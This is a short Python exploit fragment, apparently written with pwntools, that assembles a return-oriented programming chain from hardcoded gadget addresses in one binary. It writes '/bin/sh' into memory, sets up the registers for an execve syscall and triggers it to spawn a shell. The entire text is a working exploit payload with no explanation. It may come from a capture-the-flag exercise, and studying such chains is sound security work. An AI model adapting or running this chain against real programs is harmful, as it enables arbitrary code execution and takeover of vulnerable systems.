payload = p64(0x41e72e)
#0x000000000041e72e: pop rax; add al, 0xff; ret; 
payload += p64(0x50d061)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4286ae)
# 0x00000000004286ae: mov qword ptr [rax + 0x10], rdi; pop rbp; ret; 
payload += p64(0x0)+p64(0x41fb07)
# 0x000000000041fb07: pop rdx; add al, 0xff; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x50d070)+p64(0x41e72e)
# 0x000000000041e72e: pop rax; add al, 0xff; ret; 
payload += p64(0x3c)+p64(0x403090)
# 0x0000000000403090: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x457243)
# 0x0000000000457243: syscall; 
payload += b''
